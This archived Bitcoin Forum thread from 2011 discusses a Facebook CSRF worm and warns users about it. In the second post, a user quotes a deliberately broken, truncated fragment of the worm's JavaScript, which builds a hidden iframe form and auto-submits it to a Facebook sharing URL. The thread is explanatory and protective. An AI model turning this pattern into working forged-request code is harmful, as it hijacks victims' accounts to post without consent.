Bitcoin Forum
September 25, 2017, 01:17:51 AM *
News: Latest stable version of Bitcoin Core:  [Torrent]. (New!)
   Home   Help Search Donate Login Register  
Pages: [1]
Author Topic: XSS / CSFR Facebook hostile-page  (Read 897 times)
Offline Offline

Activity: 1078

View Profile
July 03, 2011, 11:31:31 PM

For people keeping wondering about XSS and CSRF, here's an example of what it can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp:// (link replaced with hxxp - Make sure you've Javascript disabled before you try it, then you can look at the source.

This is also a warning, just in case of a friend of yours had post some crap alike to his or your wall.
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
Sr. Member
Offline Offline

Activity: 294

View Profile
July 06, 2011, 05:16:49 PM

Sharing the part that does the CSRF here, for those who are interested...

function jacks(site,params){
var div = document.createElement('div');
div.innerHTML = '<iframe></iframe>';
var iframe = div.firstChild;
var iframeDocument = iframe.documentHandler;;
var form = iframeDocument.createElement('form');
for (param in params){
var field = iframeDocument.createElement('input');
field.setAttribute('type', 'hidden');
field.setAttribute('name', param);
field.setAttribute('value', params[param]);
What this code roughly does is creating an iframe with a form that is set to a specific Facebook sharing URL (that is also called by their on-site sharing functionality), inserting a specific set of "parameters" (form fields) and corresponding values, and automatically submits the forum. This is all done in the background of course. The target URL and parameters can be specified in this function.

The code I posted here was edited to need some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.
Pages: [1]
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!